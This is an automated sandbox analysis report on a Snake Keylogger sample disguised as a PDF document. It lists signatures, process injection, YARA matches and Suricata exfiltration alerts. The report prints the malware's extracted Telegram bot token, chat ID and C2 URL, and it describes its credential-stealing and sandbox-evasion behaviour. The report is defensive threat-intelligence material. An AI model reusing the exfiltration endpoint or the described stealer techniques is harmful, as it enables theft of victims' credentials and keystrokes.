Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe

Overview

General Information

Sample name:FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe
renamed because original name is a hash value
Original sample name:FA_35_01_2025_STA_Wzr_standard_pdf .scr.exe
Analysis ID:1589957
MD5:c264894ed58fdb81e565236476bfe7ca
SHA1:9f64388e03f8162ecca1ec6620b52b1a586ea369
SHA256:6b5d2ed235ccf7757a7144116baf1376abfd13b7fa5d87d130db3af889c72a51
Tags:evasionexekeyloggersnakesnakekeyloggertelegramuser-nfsec_pl
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (a lot of spaces)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

Process Tree

  • System is w10x64
  • FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe (PID: 2924 cmdline: "C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe" MD5: C264894ED58FDB81E565236476BFE7CA)
    • InstallUtil.exe (PID: 5148 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendMessage"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendMessage?chat_id=1018401531", "Token": "7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY", "Chat_id": "1018401531", "Version": "5.1"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2221534683.00000000065D0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000003.00000002.3287740367.00000000027D4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000003.00000002.3285551020.0000000000362000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
        00000003.00000002.3285551020.0000000000362000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x14080:$a1: get_encryptedPassword
        • 0x14364:$a2: get_encryptedUsername
        • 0x13e8c:$a3: get_timePasswordChanged
        • 0x13f87:$a4: get_passwordField
        • 0x14096:$a5: set_encryptedPassword
        • 0x1570b:$a7: get_logins
        • 0x1566e:$a10: KeyLoggerEventArgs
        • 0x152d9:$a11: KeyLoggerEventArgsEventHandler
        00000003.00000002.3285551020.0000000000362000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
        • 0x19076:$x1: $%SMTPDV$
        • 0x17a48:$x2: $#TheHashHere%&
        • 0x1901e:$x3: %FTPDV$
        • 0x179e8:$x4: $%TelegramDv$
        • 0x152d9:$x5: KeyLoggerEventArgs
        • 0x1566e:$x5: KeyLoggerEventArgs
        • 0x19042:$m2: Clipboard Logs ID
        • 0x19280:$m2: Screenshot Logs ID
        • 0x19390:$m2: keystroke Logs ID
        • 0x1966a:$m3: SnakePW
        • 0x19258:$m4: \SnakeKeylogger\
        Click to see the 14 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe.65d0000.7.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          0.2.FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe.65d0000.7.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            3.2.InstallUtil.exe.360000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              3.2.InstallUtil.exe.360000.0.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
                3.2.InstallUtil.exe.360000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0x14280:$a1: get_encryptedPassword
                • 0x14564:$a2: get_encryptedUsername
                • 0x1408c:$a3: get_timePasswordChanged
                • 0x14187:$a4: get_passwordField
                • 0x14296:$a5: set_encryptedPassword
                • 0x1590b:$a7: get_logins
                • 0x1586e:$a10: KeyLoggerEventArgs
                • 0x154d9:$a11: KeyLoggerEventArgsEventHandler
                Click to see the 18 entries

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-13T11:45:33.374407+010028033053Unknown Traffic192.168.2.549810104.21.80.1443TCP
                2025-01-13T11:45:42.971552+010028033053Unknown Traffic192.168.2.549874104.21.80.1443TCP
                2025-01-13T11:45:50.867254+010028033053Unknown Traffic192.168.2.549930104.21.80.1443TCP
                2025-01-13T11:45:52.063515+010028033053Unknown Traffic192.168.2.549942104.21.80.1443TCP
                2025-01-13T11:45:53.241532+010028033053Unknown Traffic192.168.2.549949104.21.80.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-13T11:45:31.793706+010028032742Potentially Bad Traffic192.168.2.549708158.101.44.24280TCP
                2025-01-13T11:45:32.809334+010028032742Potentially Bad Traffic192.168.2.549708158.101.44.24280TCP
                2025-01-13T11:45:42.418700+010028032742Potentially Bad Traffic192.168.2.549816158.101.44.24280TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-13T11:45:59.403234+010028530061A Network Trojan was detected192.168.2.549990149.154.167.220443TCP
                2025-01-13T11:46:09.580717+010028530061A Network Trojan was detected192.168.2.549994149.154.167.220443TCP
                2025-01-13T11:46:10.544550+010028530061A Network Trojan was detected192.168.2.549995149.154.167.220443TCP
                2025-01-13T11:46:11.505378+010028530061A Network Trojan was detected192.168.2.549996149.154.167.220443TCP
                2025-01-13T11:46:12.437061+010028530061A Network Trojan was detected192.168.2.549997149.154.167.220443TCP
                2025-01-13T11:46:13.380749+010028530061A Network Trojan was detected192.168.2.549998149.154.167.220443TCP
                2025-01-13T11:46:14.354472+010028530061A Network Trojan was detected192.168.2.549999149.154.167.220443TCP
                2025-01-13T11:46:15.431879+010028530061A Network Trojan was detected192.168.2.550000149.154.167.220443TCP
                2025-01-13T11:46:16.428522+010028530061A Network Trojan was detected192.168.2.550001149.154.167.220443TCP
                2025-01-13T11:46:17.574644+010028530061A Network Trojan was detected192.168.2.550002149.154.167.220443TCP
                2025-01-13T11:46:18.735150+010028530061A Network Trojan was detected192.168.2.550003149.154.167.220443TCP
                2025-01-13T11:46:19.642055+010028530061A Network Trojan was detected192.168.2.550004149.154.167.220443TCP
                2025-01-13T11:46:20.628475+010028530061A Network Trojan was detected192.168.2.550006149.154.167.220443TCP
                2025-01-13T11:46:21.603199+010028530061A Network Trojan was detected192.168.2.550007149.154.167.220443TCP
                2025-01-13T11:46:22.617688+010028530061A Network Trojan was detected192.168.2.550008149.154.167.220443TCP
                2025-01-13T11:46:23.665126+010028530061A Network Trojan was detected192.168.2.550009149.154.167.220443TCP
                2025-01-13T11:46:24.826805+010028530061A Network Trojan was detected192.168.2.550010149.154.167.220443TCP
                2025-01-13T11:46:25.998096+010028530061A Network Trojan was detected192.168.2.550011149.154.167.220443TCP
                2025-01-13T11:46:26.943173+010028530061A Network Trojan was detected192.168.2.550012149.154.167.220443TCP
                2025-01-13T11:46:27.848663+010028530061A Network Trojan was detected192.168.2.550013149.154.167.220443TCP
                2025-01-13T11:46:28.781226+010028530061A Network Trojan was detected192.168.2.550014149.154.167.220443TCP
                2025-01-13T11:46:29.725503+010028530061A Network Trojan was detected192.168.2.550015149.154.167.220443TCP
                2025-01-13T11:46:30.634589+010028530061A Network Trojan was detected192.168.2.550016149.154.167.220443TCP
                2025-01-13T11:46:31.580014+010028530061A Network Trojan was detected192.168.2.550017149.154.167.220443TCP
                2025-01-13T11:46:32.514287+010028530061A Network Trojan was detected192.168.2.550018149.154.167.220443TCP
                2025-01-13T11:46:33.483346+010028530061A Network Trojan was detected192.168.2.550019149.154.167.220443TCP
                2025-01-13T11:46:34.420047+010028530061A Network Trojan was detected192.168.2.550020149.154.167.220443TCP
                2025-01-13T11:46:35.371881+010028530061A Network Trojan was detected192.168.2.550021149.154.167.220443TCP
                2025-01-13T11:46:36.337661+010028530061A Network Trojan was detected192.168.2.550022149.154.167.220443TCP
                2025-01-13T11:46:37.352701+010028530061A Network Trojan was detected192.168.2.550023149.154.167.220443TCP
                2025-01-13T11:46:38.266331+010028530061A Network Trojan was detected192.168.2.550024149.154.167.220443TCP
                2025-01-13T11:46:39.405107+010028530061A Network Trojan was detected192.168.2.550025149.154.167.220443TCP
                2025-01-13T11:46:40.334351+010028530061A Network Trojan was detected192.168.2.550026149.154.167.220443TCP
                2025-01-13T11:46:41.290088+010028530061A Network Trojan was detected192.168.2.550027149.154.167.220443TCP
                2025-01-13T11:46:42.197426+010028530061A Network Trojan was detected192.168.2.550028149.154.167.220443TCP
                2025-01-13T11:46:43.162937+010028530061A Network Trojan was detected192.168.2.550029149.154.167.220443TCP
                2025-01-13T11:46:44.091503+010028530061A Network Trojan was detected192.168.2.550030149.154.167.220443TCP
                2025-01-13T11:46:45.070615+010028530061A Network Trojan was detected192.168.2.550031149.154.167.220443TCP
                2025-01-13T11:46:46.028409+010028530061A Network Trojan was detected192.168.2.550032149.154.167.220443TCP
                2025-01-13T11:46:47.001394+010028530061A Network Trojan was detected192.168.2.550033149.154.167.220443TCP
                2025-01-13T11:46:47.955845+010028530061A Network Trojan was detected192.168.2.550034149.154.167.220443TCP
                2025-01-13T11:46:48.921185+010028530061A Network Trojan was detected192.168.2.550035149.154.167.220443TCP
                2025-01-13T11:46:50.061690+010028530061A Network Trojan was detected192.168.2.550036149.154.167.220443TCP
                2025-01-13T11:46:51.160623+010028530061A Network Trojan was detected192.168.2.550037149.154.167.220443TCP
                2025-01-13T11:46:52.173751+010028530061A Network Trojan was detected192.168.2.550038149.154.167.220443TCP
                2025-01-13T11:46:53.219669+010028530061A Network Trojan was detected192.168.2.550039149.154.167.220443TCP
                2025-01-13T11:46:54.196073+010028530061A Network Trojan was detected192.168.2.550040149.154.167.220443TCP
                2025-01-13T11:46:55.187941+010028530061A Network Trojan was detected192.168.2.550041149.154.167.220443TCP
                2025-01-13T11:46:56.193399+010028530061A Network Trojan was detected192.168.2.550042149.154.167.220443TCP
                2025-01-13T11:46:57.252167+010028530061A Network Trojan was detected192.168.2.550043149.154.167.220443TCP
                2025-01-13T11:46:58.246957+010028530061A Network Trojan was detected192.168.2.550044149.154.167.220443TCP
                2025-01-13T11:46:59.339270+010028530061A Network Trojan was detected192.168.2.550045149.154.167.220443TCP
                2025-01-13T11:47:00.494088+010028530061A Network Trojan was detected192.168.2.550046149.154.167.220443TCP
                2025-01-13T11:47:01.510123+010028530061A Network Trojan was detected192.168.2.550047149.154.167.220443TCP
                2025-01-13T11:47:02.585067+010028530061A Network Trojan was detected192.168.2.550048149.154.167.220443TCP
                2025-01-13T11:47:03.648643+010028530061A Network Trojan was detected192.168.2.550049149.154.167.220443TCP
                2025-01-13T11:47:05.466919+010028530061A Network Trojan was detected192.168.2.550050149.154.167.220443TCP
                2025-01-13T11:47:06.446508+010028530061A Network Trojan was detected192.168.2.550051149.154.167.220443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-13T11:45:59.068893+010018100081Potentially Bad Traffic192.168.2.549990149.154.167.220443TCP
                2025-01-13T11:46:09.255683+010018100081Potentially Bad Traffic192.168.2.549994149.154.167.220443TCP
                2025-01-13T11:46:10.195911+010018100081Potentially Bad Traffic192.168.2.549995149.154.167.220443TCP
                2025-01-13T11:46:11.172308+010018100081Potentially Bad Traffic192.168.2.549996149.154.167.220443TCP
                2025-01-13T11:46:12.131390+010018100081Potentially Bad Traffic192.168.2.549997149.154.167.220443TCP
                2025-01-13T11:46:13.053916+010018100081Potentially Bad Traffic192.168.2.549998149.154.167.220443TCP
                2025-01-13T11:46:14.002711+010018100081Potentially Bad Traffic192.168.2.549999149.154.167.220443TCP
                2025-01-13T11:46:14.997550+010018100081Potentially Bad Traffic192.168.2.550000149.154.167.220443TCP
                2025-01-13T11:46:16.077312+010018100081Potentially Bad Traffic192.168.2.550001149.154.167.220443TCP
                2025-01-13T11:46:17.151686+010018100081Potentially Bad Traffic192.168.2.550002149.154.167.220443TCP
                2025-01-13T11:46:18.220317+010018100081Potentially Bad Traffic192.168.2.550003149.154.167.220443TCP
                2025-01-13T11:46:19.348269+010018100081Potentially Bad Traffic192.168.2.550004149.154.167.220443TCP
                2025-01-13T11:46:20.276100+010018100081Potentially Bad Traffic192.168.2.550006149.154.167.220443TCP
                2025-01-13T11:46:21.268711+010018100081Potentially Bad Traffic192.168.2.550007149.154.167.220443TCP
                2025-01-13T11:46:22.221961+010018100081Potentially Bad Traffic192.168.2.550008149.154.167.220443TCP
                2025-01-13T11:46:23.281941+010018100081Potentially Bad Traffic192.168.2.550009149.154.167.220443TCP
                2025-01-13T11:46:24.289021+010018100081Potentially Bad Traffic192.168.2.550010149.154.167.220443TCP
                2025-01-13T11:46:25.467086+010018100081Potentially Bad Traffic192.168.2.550011149.154.167.220443TCP
                2025-01-13T11:46:26.642896+010018100081Potentially Bad Traffic192.168.2.550012149.154.167.220443TCP
                2025-01-13T11:46:27.573142+010018100081Potentially Bad Traffic192.168.2.550013149.154.167.220443TCP
                2025-01-13T11:46:28.493494+010018100081Potentially Bad Traffic192.168.2.550014149.154.167.220443TCP
                2025-01-13T11:46:29.426365+010018100081Potentially Bad Traffic192.168.2.550015149.154.167.220443TCP
                2025-01-13T11:46:30.341952+010018100081Potentially Bad Traffic192.168.2.550016149.154.167.220443TCP
                2025-01-13T11:46:31.265421+010018100081Potentially Bad Traffic192.168.2.550017149.154.167.220443TCP
                2025-01-13T11:46:32.222111+010018100081Potentially Bad Traffic192.168.2.550018149.154.167.220443TCP
                2025-01-13T11:46:33.164037+010018100081Potentially Bad Traffic192.168.2.550019149.154.167.220443TCP
                2025-01-13T11:46:34.118980+010018100081Potentially Bad Traffic192.168.2.550020149.154.167.220443TCP
                2025-01-13T11:46:35.063786+010018100081Potentially Bad Traffic192.168.2.550021149.154.167.220443TCP
                2025-01-13T11:46:36.024707+010018100081Potentially Bad Traffic192.168.2.550022149.154.167.220443TCP
                2025-01-13T11:46:36.958165+010018100081Potentially Bad Traffic192.168.2.550023149.154.167.220443TCP
                2025-01-13T11:46:37.966482+010018100081Potentially Bad Traffic192.168.2.550024149.154.167.220443TCP
                2025-01-13T11:46:38.893251+010018100081Potentially Bad Traffic192.168.2.550025149.154.167.220443TCP
                2025-01-13T11:46:40.044138+010018100081Potentially Bad Traffic192.168.2.550026149.154.167.220443TCP
                2025-01-13T11:46:40.983891+010018100081Potentially Bad Traffic192.168.2.550027149.154.167.220443TCP
                2025-01-13T11:46:41.926174+010018100081Potentially Bad Traffic192.168.2.550028149.154.167.220443TCP
                2025-01-13T11:46:42.851220+010018100081Potentially Bad Traffic192.168.2.550029149.154.167.220443TCP
                2025-01-13T11:46:43.783614+010018100081Potentially Bad Traffic192.168.2.550030149.154.167.220443TCP
                2025-01-13T11:46:44.711930+010018100081Potentially Bad Traffic192.168.2.550031149.154.167.220443TCP
                2025-01-13T11:46:45.733557+010018100081Potentially Bad Traffic192.168.2.550032149.154.167.220443TCP
                2025-01-13T11:46:46.684863+010018100081Potentially Bad Traffic192.168.2.550033149.154.167.220443TCP
                2025-01-13T11:46:47.640931+010018100081Potentially Bad Traffic192.168.2.550034149.154.167.220443TCP
                2025-01-13T11:46:48.593660+010018100081Potentially Bad Traffic192.168.2.550035149.154.167.220443TCP
                2025-01-13T11:46:49.569581+010018100081Potentially Bad Traffic192.168.2.550036149.154.167.220443TCP
                2025-01-13T11:46:50.702090+010018100081Potentially Bad Traffic192.168.2.550037149.154.167.220443TCP
                2025-01-13T11:46:51.819628+010018100081Potentially Bad Traffic192.168.2.550038149.154.167.220443TCP
                2025-01-13T11:46:52.816853+010018100081Potentially Bad Traffic192.168.2.550039149.154.167.220443TCP
                2025-01-13T11:46:53.908147+010018100081Potentially Bad Traffic192.168.2.550040149.154.167.220443TCP
                2025-01-13T11:46:54.827171+010018100081Potentially Bad Traffic192.168.2.550041149.154.167.220443TCP
                2025-01-13T11:46:55.839898+010018100081Potentially Bad Traffic192.168.2.550042149.154.167.220443TCP
                2025-01-13T11:46:56.819382+010018100081Potentially Bad Traffic192.168.2.550043149.154.167.220443TCP
                2025-01-13T11:46:57.884010+010018100081Potentially Bad Traffic192.168.2.550044149.154.167.220443TCP
                2025-01-13T11:46:58.904663+010018100081Potentially Bad Traffic192.168.2.550045149.154.167.220443TCP
                2025-01-13T11:47:00.000501+010018100081Potentially Bad Traffic192.168.2.550046149.154.167.220443TCP
                2025-01-13T11:47:01.133445+010018100081Potentially Bad Traffic192.168.2.550047149.154.167.220443TCP
                2025-01-13T11:47:02.211760+010018100081Potentially Bad Traffic192.168.2.550048149.154.167.220443TCP
                2025-01-13T11:47:03.204098+010018100081Potentially Bad Traffic192.168.2.550049149.154.167.220443TCP
                2025-01-13T11:47:05.049141+010018100081Potentially Bad Traffic192.168.2.550050149.154.167.220443TCP
                2025-01-13T11:47:06.084137+010018100081Potentially Bad Traffic192.168.2.550051149.154.167.220443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 00000003.00000002.3287740367.0000000002701000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendMessage?chat_id=1018401531", "Token": "7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY", "Chat_id": "1018401531", "Version": "5.1"}
                Source: InstallUtil.exe.5148.3.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendMessage"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeJoe Sandbox ML: detected

                Location Tracking

                barindex
                Tries to detect the country of the analysis system (by using the IP)
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49804 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49990 version: TLS 1.2
                Source: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe, 00000000.00000002.2217796387.0000000003C11000.00000004.00000800.00020000.00000000.sdmp, FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe, 00000000.00000002.2223096565.0000000006880000.00000004.08000000.00040000.00000000.sdmp, FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe, 00000000.00000002.2217796387.0000000003C91000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe, 00000000.00000002.2217796387.0000000003C11000.00000004.00000800.00020000.00000000.sdmp, FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe, 00000000.00000002.2223096565.0000000006880000.00000004.08000000.00040000.00000000.sdmp, FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe, 00000000.00000002.2217796387.0000000003C91000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: protobuf-net.pdbSHA256}Lq source: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe, 00000000.00000002.2221960975.00000000066F0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: protobuf-net.pdb source: FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe, 00000000.00000002.2221960975.00000000066F0000.00000004.08000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 4x nop then jmp 067537DBh0_2_06753610
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 4x nop then jmp 067537DBh0_2_06753601
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 4x nop then jmp 0676DCDDh0_2_0676DAE8
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 4x nop then jmp 0676DCDDh0_2_0676DAD9
                Source: C:\Users\user\Desktop\FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeCode function: 4x nop then jmp 0676D750h0_2_0676D380
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 00B8E62Fh3_2_00B8E441
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 00B8EFB9h3_2_00B8E441
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 00B8FA49h3_2_00B8F788
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_00B8E015
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_00B8D800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_00B8DE33
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 061477EDh3_2_061474B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 061441B1h3_2_06143F08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06146A51h3_2_061467A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06144A89h3_2_061447E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06146EA9h3_2_06146C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06144EE1h3_2_06144C38
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06140741h3_2_06140498
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06145791h3_2_061454E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]3_2_0614E5AA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0614606Bh3_2_06145DC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 061465F9h3_2_06146350
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06144631h3_2_06144388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06147301h3_2_06147058
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 061402E9h3_2_06140040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06145339h3_2_06145090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06140B99h3_2_061408F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06145BE9h3_2_06145940

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50014 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50006 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:50014 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50004 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50037 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:50004 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50036 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:50006 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50030 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:50036 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:50030 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:50037 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49996 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49996 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50041 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:50021 -> 149.154.167.220:443
